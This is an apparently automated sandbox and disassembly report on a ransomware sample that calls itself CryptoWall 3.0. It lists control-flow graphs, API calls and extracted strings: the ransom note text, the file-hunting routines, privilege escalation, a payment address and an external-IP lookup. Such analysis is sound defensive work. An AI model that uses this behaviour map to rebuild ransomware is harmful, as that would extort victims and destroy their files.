                                                                                                                            control_flow_graph 0 41b2c0-41b32b GetVersionExW LoadLibraryW * 3 1 41b331-41b34f GetProcAddress * 2 0->1 2 41b413-41b419 0->2 3 41b355-41b357 1->3 4 41b40c-41b40d FreeLibrary 1->4 5 41b51c-41b51e 2->5 6 41b41f-41b44b GetProcAddress * 3 2->6 3->4 9 41b35d-41b371 NetStatisticsGet 3->9 4->2 7 41b524-41b5bc GetProcAddress * 12 5->7 8 41b859-41b873 call 41b900 GlobalMemoryStatus 5->8 10 41b511-41b516 FreeLibrary 6->10 11 41b451-41b456 6->11 12 41b852-41b853 FreeLibrary 7->12 13 41b5c2-41b5c6 7->13 27 41b875-41b87a 8->27 28 41b87f-41b884 8->28 15 41b373-41b37a 9->15 16 41b3b5-41b3cb NetStatisticsGet 9->16 10->5 11->10 17 41b45c-41b45e 11->17 12->8 13->12 19 41b5cc-41b5d0 13->19 21 41b386-41b38b 15->21 22 41b37c-41b381 15->22 16->4 18 41b3cd-41b3d4 16->18 17->10 23 41b464-41b478 17->23 24 41b3e0-41b3e5 18->24 25 41b3d6-41b3db 18->25 19->12 26 41b5d6-41b5da 19->26 29 41b38d-41b3a9 21->29 30 41b3ac-41b3b0 21->30 22->21 37 41b4b8-41b4c7 23->37 38 41b47a-41b48f 23->38 32 41b403-41b407 24->32 33 41b3e7-41b400 24->33 25->24 26->12 34 41b5e0-41b5e4 26->34 27->28 35 41b8a5-41b8b6 GetCurrentProcessId 28->35 36 41b886-41b8a2 28->36 29->30 30->16 32->4 33->32 34->12 39 41b5ea-41b5ee 34->39 41 41b8c2-41b8c7 35->41 42 41b8b8-41b8bd 35->42 36->35 50 41b4ca-41b4cc 37->50 53 41b491-41b4a5 call 41b260 38->53 54 41b4ad-41b4b3 38->54 39->12 46 41b5f4-41b5f8 39->46 43 41b8e5-41b8fe call 423ebb 41->43 44 41b8c9-41b8e2 41->44 42->41 44->43 46->12 51 41b5fe-41b602 46->51 50->10 56 41b4ce-41b4e3 50->56 51->12 57 41b608-41b60c 51->57 53->54 54->37 64 41b4e5-41b4fe call 41b260 56->64 65 41b506-41b50c 56->65 57->12 59 41b612-41b616 57->59 59->12 60 41b61c-41b61e 59->60 60->12 63 41b624-41b630 CreateToolhelp32Snapshot 60->63 63->12 67 41b636-41b648 63->67 64->65 65->10 69 41b656-41b662 Heap32ListFirst 67->69 70 41b64a-41b652 GetTickCount 67->70 71 41b6f9-41b709 69->71 72 41b668-41b6a0 call 41b260 Heap32First 69->72 70->69 73 41b713-41b726 Process32First 71->73 74 41b70b-41b70d GetTickCount 71->74 80 41b6a2-41b6a7 72->80 81 41b6dd-41b6ed Heap32ListNext 72->81 76 41b728-41b756 call 41b260 73->76 77 41b75e-41b76e 73->77 74->73 76->77 95 41b758-41b75c GetTickCount 76->95 82 41b770-41b772 GetTickCount 77->82 83 41b778-41b78b 77->83 85 41b6b0-41b6d0 call 41b260 Heap32Next 80->85 81->71 86 41b6ef-41b6f3 GetTickCount 81->86 82->83 91 41b7c3-41b7d3 83->91 92 41b78d-41b7bb call 41b260 83->92 96 41b6d2-41b6d5 85->96 97 41b6d7 85->97 86->71 86->72 93 41b7d5-41b7d7 GetTickCount 91->93 94 41b7dd-41b7f0 91->94 92->91 106 41b7bd-41b7c1 GetTickCount 92->106 93->94 102 41b7f2 94->102 103 41b836-41b83c 94->103 95->76 95->77 96->85 96->97 97->81 107 41b800-41b82e call 41b260 102->107 104 41b847-41b84c CloseHandle 103->104 105 41b83e-41b845 103->105 104->12 105->12 106->91 106->92 107->103 112 41b830-41b834 GetTickCount 107->112 112->103 112->107
                                                                                                                            APIs
                                                                                                                            • GetVersionExW.KERNEL32 ref: 0041B2FA
                                                                                                                            • LoadLibraryW.KERNEL32(ADVAPI32.DLL), ref: 0041B30B
                                                                                                                            • LoadLibraryW.KERNEL32(KERNEL32.DLL), ref: 0041B316
                                                                                                                            • LoadLibraryW.KERNEL32(NETAPI32.DLL), ref: 0041B31F
                                                                                                                            • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 0041B337
                                                                                                                            • GetProcAddress.KERNEL32(00000000,NetApiBufferFree), ref: 0041B343
                                                                                                                            • NetStatisticsGet.NETAPI32(00000000,LanmanWorkstation,00000000,00000000,?), ref: 0041B36D
                                                                                                                            • NetStatisticsGet.NETAPI32(00000000,LanmanServer,00000000,00000000,?), ref: 0041B3C5
                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 0041B40D
                                                                                                                            • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 0041B425
                                                                                                                            • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 0041B433
                                                                                                                            • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 0041B443
                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 0041B516
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0041B52C
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CloseToolhelp32Snapshot), ref: 0041B538
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0041B544
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0041B550
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0041B55C
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0041B568
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0041B574
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0041B580
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0041B58C
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0041B598
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0041B5A4
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0041B5B0
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041B627
                                                                                                                            • GetTickCount.KERNEL32 ref: 0041B64A
                                                                                                                            • Heap32ListFirst.KERNEL32(00000000,00000010), ref: 0041B65C
                                                                                                                            • Heap32First.KERNEL32(?,?,?), ref: 0041B69A
                                                                                                                            • Heap32Next.KERNEL32(?), ref: 0041B6CA
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$Library$Heap32Load$FirstFreeStatistics$CountCreateListNextSnapshotTickToolhelp32Version
                                                                                                                            • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next
                                                                                                                            • API String ID: 1388370095-715222291
                                                                                                                            • Opcode ID: 073c3130b0a0d99d4bef3bd7d91e81b484a493f757e71c5bcc9876510200a30d
                                                                                                                            • Instruction ID: 9b0ab41e44d741afa709f8f910670cdf3924008bcb49aeebd6d02c398950f77e
                                                                                                                            • Opcode Fuzzy Hash: 073c3130b0a0d99d4bef3bd7d91e81b484a493f757e71c5bcc9876510200a30d
                                                                                                                            • Instruction Fuzzy Hash: D8F130706043459BD720DF65CC84B9BBBF8EFC8B44F04892EF59896250DB78D984CB9A
                                                                                                                            Function 0041D4D0 Relevance: 116.1, APIs: 44, Strings: 22, Instructions: 554threadsynchronizationcomCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 113 41d4d0-41d578 call 42c690 LoadStringW * 2 call 41e8a0 CoInitializeEx AllocateAndInitializeSid 118 41d57a-41d591 CheckTokenMembership 113->118 119 41d5ac-41d68a SHGetFolderPathW call 421aa0 CoCreateInstance * 2 113->119 120 41d593 118->120 121 41d599-41d5a6 FreeSid 118->121 126 41d694-41d6cd call 42b910 119->126 127 41d68c-41d68e ExitProcess 119->127 120->121 121->119 131 41d6d0-41d6d6 126->131 132 41d6f6-41d6f8 131->132 133 41d6d8-41d6db 131->133 136 41d6fb-41d6fd 132->136 134 41d6f2-41d6f4 133->134 135 41d6dd-41d6e5 133->135 134->136 135->132 137 41d6e7-41d6f0 135->137 138 41d706-41d71d 136->138 139 41d6ff-41d701 call 425203 136->139 137->131 137->134 142 41dc33-41dc53 call 423ebb 138->142 143 41d723-41d729 138->143 139->138 143->142 145 41d72f-41d74a 143->145 148 41d753-41d761 145->148 149 41d74c-41d74e call 425203 145->149 151 41d763-41d765 call 425203 148->151 152 41d76a-41d77b 148->152 149->148 151->152 155 41d784-41d8a2 GetModuleHandleW GetProcAddress * 2 SHGetFolderPathW * 3 SHGetSpecialFolderPathW call 424820 * 3 SHGetFolderPathW * 2 GetModuleFileNameW call 424895 call 424820 DeleteFileW call 41e7a0 LookupPrivilegeValueA 152->155 156 41d77d-41d77f call 425203 152->156 170 41d8a4-41d8aa call 41e810 155->170 171 41d8af-41d8c0 call 41ddd0 155->171 156->155 170->171 175 41d901 call 41dee0 171->175 176 41d8c2-41d8cd 171->176 181 41d906-41d908 175->181 178 41d8f3-41d8f8 176->178 179 41d8cf 176->179 178->175 180 41d8fa-41d8ff 178->180 179->175 182 41d8d1-41d8d3 179->182 180->175 183 41d90e-41d926 CreateMutexW GetLastError 180->183 181->142 181->183 184 41d8d5-41d8da 182->184 185 41d8dc-41d8e3 call 41ed00 182->185 183->142 187 41d92c-41da47 call 42b910 GetVersionExW call 401bf0 call 41e150 call 41efe0 * 2 CreateThread call 42b910 call 421a60 call 424cd4 183->187 184->183 184->185 185->142 190 41d8e9-41d8ee call 41d210 185->190 208 41da49-41da77 call 424d26 call 424f0c 187->208 209 41da7f-41da90 call 421b20 187->209 190->142 217 41da7c 208->217 214 41da92-41daa4 CreateThread 209->214 215 41daaa-41dae2 CreateThread * 2 SetThreadPriority WaitForSingleObject call 41dc60 209->215 214->215 219 41dae7-41dc2e call 42b910 call 42441c call 424820 ShellExecuteW call 42441c call 424820 ShellExecuteW call 42441c call 424820 call 41e3f0 ShellExecuteW CreateThread WaitForSingleObject CreateThread WaitForSingleObject call 41e050 215->219 217->209 219->142
                                                                                                                            APIs
                                                                                                                            • LoadStringW.USER32(?,00000067,scan,00000064), ref: 0041D519
                                                                                                                            • LoadStringW.USER32(?,0000006D,SCAN,00000064), ref: 0041D525
                                                                                                                              • Part of subcall function 0041E8A0: LoadIconW.USER32 ref: 0041E8D6
                                                                                                                              • Part of subcall function 0041E8A0: LoadCursorW.USER32 ref: 0041E8E2
                                                                                                                              • Part of subcall function 0041E8A0: LoadIconW.USER32 ref: 0041E906
                                                                                                                              • Part of subcall function 0041E8A0: RegisterClassExW.USER32(00000030), ref: 0041E90F
                                                                                                                            • CoInitializeEx.OLE32(00000000,00000000), ref: 0041D532
                                                                                                                            • AllocateAndInitializeSid.ADVAPI32 ref: 0041D56A
                                                                                                                            • CheckTokenMembership.KERNELBASE(00000000,?,?), ref: 0041D589
                                                                                                                            • FreeSid.ADVAPI32(?), ref: 0041D5A0
                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,004C8B20), ref: 0041D5C1
                                                                                                                            • CoCreateInstance.OLE32(004365C8,00000000,00000001,00431338,?), ref: 0041D627
                                                                                                                            • CoCreateInstance.OLE32(004365D8,00000000,00000001,00431328,?), ref: 0041D63D
                                                                                                                            • ExitProcess.KERNEL32 ref: 0041D68E
                                                                                                                            • _memset.LIBCMT ref: 0041D6AA
                                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32), ref: 0041D789
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0041D79D
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 0041D7AA
                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,004CEB20), ref: 0041D7BD
                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,004D0B20), ref: 0041D7C9
                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,0000003B,00000000,00000000,004D2B20), ref: 0041D7D5
                                                                                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,004D4B20,00000005,00000000), ref: 0041D7E0
                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,00000010,00000000,00000000,004CAB20), ref: 0041D82E
                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,004CCB20), ref: 0041D83A
                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,004C6B20,00001000), ref: 0041D847
                                                                                                                            • DeleteFileW.KERNEL32(004C4B20), ref: 0041D87D
                                                                                                                              • Part of subcall function 0041E7A0: CreateFileW.KERNEL32(004C6B20,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0041E7BB
                                                                                                                              • Part of subcall function 0041E7A0: SetFilePointer.KERNEL32(00000000,00000064,00000000,00000000,?,0041D888), ref: 0041E7CF
                                                                                                                              • Part of subcall function 0041E7A0: ReadFile.KERNEL32(00000000,0041D888,00000004,?,00000000), ref: 0041E7E2
                                                                                                                              • Part of subcall function 0041E7A0: CloseHandle.KERNEL32(00000000), ref: 0041E7E9
                                                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 0041D89A
                                                                                                                              • Part of subcall function 0041E810: GetCurrentProcess.KERNEL32(00020028,?,?,?,?,?,?,0041D8AF), ref: 0041E829
                                                                                                                              • Part of subcall function 0041E810: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,0041D8AF), ref: 0041E830
                                                                                                                            • CreateMutexW.KERNEL32(00000000,00000000,435-3435-4546), ref: 0041D915
                                                                                                                            • GetLastError.KERNEL32 ref: 0041D91B
                                                                                                                            • _memset.LIBCMT ref: 0041D937
                                                                                                                            • GetVersionExW.KERNEL32(0043C728), ref: 0041D94E
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0001D390,00000000,00000000,00000000), ref: 0041DA02
                                                                                                                            • _memset.LIBCMT ref: 0041DA17
                                                                                                                            • __wfopen_s.LIBCMT ref: 0041DA3D
                                                                                                                            • _fprintf.LIBCMT ref: 0041DA6B
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0001A030,00000000,00000000,00000000), ref: 0041DAA2
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0001E5B0,00000000,00000000,00000000), ref: 0041DABE
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00013780,00000000,00000000,00000000), ref: 0041DACA
                                                                                                                            • SetThreadPriority.KERNEL32(00000000,000000F1), ref: 0041DAD1
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041DAE0
                                                                                                                            • _memset.LIBCMT ref: 0041DAFD
                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041DB4D
                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041DB97
                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041DBED
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0001D390,00000000,00000000,00000000), ref: 0041DBFE
                                                                                                                            • WaitForSingleObject.KERNEL32(?,0001D4C0), ref: 0041DC0C
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0001A030,00000000,00000000,00000000), ref: 0041DC27
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041DC2C
                                                                                                                              • Part of subcall function 0041E050: GetModuleFileNameW.KERNEL32(00000000,?,00001000,?,0041E020), ref: 0041E075
                                                                                                                              • Part of subcall function 0041E050: GetShortPathNameW.KERNEL32(?,?,00001000,?,0041E020), ref: 0041E092
                                                                                                                              • Part of subcall function 0041E050: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00001000,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 0041E0FD
                                                                                                                              • Part of subcall function 0041E050: ShellExecuteW.SHELL32(00000000,00000000,?,?,00000000,00000000), ref: 0041E11D
                                                                                                                            Strings
                                                                                                                            • %s%s%s%S, xrefs: 0041DA65
                                                                                                                            • \Recovery_File_, xrefs: 0041D7E6
                                                                                                                            • 30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC, xrefs: 0041DA54
                                                                                                                            • SCAN, xrefs: 0041D51D
                                                                                                                            • Wow64RevertWow64FsRedirection, xrefs: 0041D79F
                                                                                                                            • 1FQ2d43QjTT8zSrWe41EdxtvcVUMWyryJB, xrefs: 0041DA60
                                                                                                                            • E722D94C1CAC34B, xrefs: 0041D95E, 0041D963, 0041D968, 0041D96D, 0041D972, 0041D977, 0041D97C, 0041D995, 0041D99A, 0041D99F, 0041D9A4, 0041D9A9, 0041D9AE, 0041D9B3, 0041D9B8, 0041D9BD, 0041D9C2, 0041D9C7, 0041D9CC, 0041D9D1, 0041D9D6, 0041DA4F
                                                                                                                            • \RESTORE_FILES.TXT, xrefs: 0041DB1D
                                                                                                                            • scan, xrefs: 0041D511
                                                                                                                            • <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family, xrefs: 0041D9E0
                                                                                                                            • open, xrefs: 0041DB41, 0041DB90, 0041DBE6
                                                                                                                            • ______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________What happened to your files ?All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.More information about the encryption keys using RSA-2048 can be found h, xrefs: 0041D981
                                                                                                                            • KERNEL32, xrefs: 0041D784
                                                                                                                            • ______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________What happened to your files ?All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.More information about the encryption keys using RSA-2048 can be found h, xrefs: 0041D986
                                                                                                                            • \RESTORE_FILES.HTML, xrefs: 0041DB6A
                                                                                                                            • :Zone.Identifier, xrefs: 0041D861
                                                                                                                            • <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family, xrefs: 0041D9DB
                                                                                                                            • .txt, xrefs: 0041D80D
                                                                                                                            • Wow64DisableWow64FsRedirection, xrefs: 0041D797
                                                                                                                            • 435-3435-4546, xrefs: 0041D90E
                                                                                                                            • SeDebugPrivilege, xrefs: 0041D894
                                                                                                                            • \RESTORE_FILES.BMP, xrefs: 0041DBB4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Create$Path$FolderThread$File$Load$ExecuteShell_memset$ModuleNameObjectProcessSingleWait$AddressHandleIconInitializeInstanceProcStringToken$AllocateCheckClassCloseCurrentCursorDeleteEnvironmentErrorExitFreeLastLookupMembershipMutexOpenPointerPriorityPrivilegeReadRegisterShortSpecialValueVariableVersion__wfopen_s_fprintf
                                                                                                                            • String ID: %s%s%s%S$.txt$1FQ2d43QjTT8zSrWe41EdxtvcVUMWyryJB$30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC$435-3435-4546$:Zone.Identifier$<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family$<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family$E722D94C1CAC34B$KERNEL32$SCAN$SeDebugPrivilege$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$\RESTORE_FILES.BMP$\RESTORE_FILES.HTML$\RESTORE_FILES.TXT$\Recovery_File_$______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________What happened to your files ?All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.More information about the encryption keys using RSA-2048 can be found h$______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________What happened to your files ?All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.More information about the encryption keys using RSA-2048 can be found h$open$scan
                                                                                                                            • API String ID: 1728785742-2954225229
                                                                                                                            • Opcode ID: 6cfa9ba4c2f1b833ea24c063e1331d28ece4522e29601cc512096c7d24eb7cdf
                                                                                                                            • Instruction ID: b9353f63490a9340779b0bdb0cd734671b1939fc783d41848026e497fe5a03ea
                                                                                                                            • Opcode Fuzzy Hash: 6cfa9ba4c2f1b833ea24c063e1331d28ece4522e29601cc512096c7d24eb7cdf
                                                                                                                            • Instruction Fuzzy Hash: C502D7B0A40318BEE720EB609C86FEA7678EB58744F50459BF604B61D1D7B86D80CB6D
                                                                                                                            Function 004139B0 Relevance: 28.3, APIs: 10, Strings: 6, Instructions: 257fileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 439 4139b0-413a56 call 42c690 call 42b910 * 2 call 424895 call 424820 FindFirstFileW 450 413cf1-413d01 call 423ebb 439->450 451 413a5c-413a63 439->451 453 413a69-413a6f 451->453 454 413bff-413c4e call 424895 call 424820 * 2 451->454 456 413a74-413a7a 453->456 475 413c51-413c5a 454->475 458 413a9a-413a9c 456->458 459 413a7c-413a7f 456->459 461 413a9f-413aa1 458->461 462 413a81-413a89 459->462 463 413a96-413a98 459->463 465 413cd4-413ce4 FindNextFileW 461->465 466 413aa7-413aad 461->466 462->458 467 413a8b-413a94 462->467 463->461 465->451 470 413cea-413ceb FindClose 465->470 471 413ab2-413ab8 466->471 467->456 467->463 470->450 473 413ad8-413ada 471->473 474 413aba-413abd 471->474 478 413add-413adf 473->478 476 413ad4-413ad6 474->476 477 413abf-413ac7 474->477 475->475 479 413c5c-413c8e call 4248f8 call 424733 wcsstr 475->479 476->478 477->473 480 413ac9-413ad2 477->480 478->465 481 413ae5-413aff call 424895 478->481 490 413c90-413c9d wcsstr 479->490 491 413cc5-413cd1 call 424005 479->491 480->471 480->476 487 413b00-413b09 481->487 487->487 489 413b0b-413b12 487->489 492 413b14-413b2a call 424820 489->492 493 413b2d-413b4e call 424820 489->493 490->491 497 413c9f-413cac wcsstr 490->497 491->465 492->493 502 413b53-413b59 493->502 497->491 501 413cae-413cb8 call 414110 497->501 501->491 510 413cba-413cc0 call 413d10 501->510 504 413b79-413b7b 502->504 505 413b5b-413b5e 502->505 509 413b7e-413b80 504->509 507 413b60-413b68 505->507 508 413b75-413b77 505->508 507->504 511 413b6a-413b73 507->511 508->509 509->465 512 413b86-413b8c 509->512 510->491 511->502 511->508 514 413b91-413b97 512->514 515 413bb7-413bb9 514->515 516 413b99-413b9c 514->516 517 413bbc-413bbe 515->517 518 413bb3-413bb5 516->518 519 413b9e-413ba6 516->519 517->465 521 413bc4-413bf5 call 4139b0 call 424895 call 4133e0 517->521 518->517 519->515 520 413ba8-413bb1 519->520 520->514 520->518 527 413bfa 521->527 527->465
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Findwcsstr$File_memset$CloseFirstNext__wcsdup_free
                                                                                                                            • String ID: IC$ L$.aaa$\*.*$recovery_file$restore_files
                                                                                                                            • API String ID: 2748371789-1963468680
                                                                                                                            • Opcode ID: a8550e159df8c798b7e77e3f41290ecbea0e537c73ceda8fd00c370e833da4db
                                                                                                                            • Instruction ID: 8cd3bdaa977526fda1ac96882a880a1b440355606e10f584730b7f75abe76e56
                                                                                                                            • Opcode Fuzzy Hash: a8550e159df8c798b7e77e3f41290ecbea0e537c73ceda8fd00c370e833da4db
                                                                                                                            • Instruction Fuzzy Hash: 08815BB2A0021456D720EF70DC42BEB7374EF64755F4441A6F909A6286F779ABC8C78C
                                                                                                                            Function 0041A560 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 73networkfileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0041A58A
                                                                                                                            • InternetOpenW.WININET(Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NE,00000004,00000000,00000000,00000000), ref: 0041A59F
                                                                                                                            • InternetOpenUrlW.WININET(00000000,http://ipinfo.io/ip,00000000,00000000,40000000,00000000), ref: 0041A5B8
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041A5C5
                                                                                                                            • InternetReadFile.WININET(00000000,00000000,000000C8,?), ref: 0041A5EF
                                                                                                                            • _strcpy_s.LIBCMT ref: 0041A61D
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041A62C
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041A62F
                                                                                                                            Strings
                                                                                                                            • Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NE, xrefs: 0041A59A
                                                                                                                            • 8.46.123.189, xrefs: 0041A618
                                                                                                                            • http://ipinfo.io/ip, xrefs: 0041A5B2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
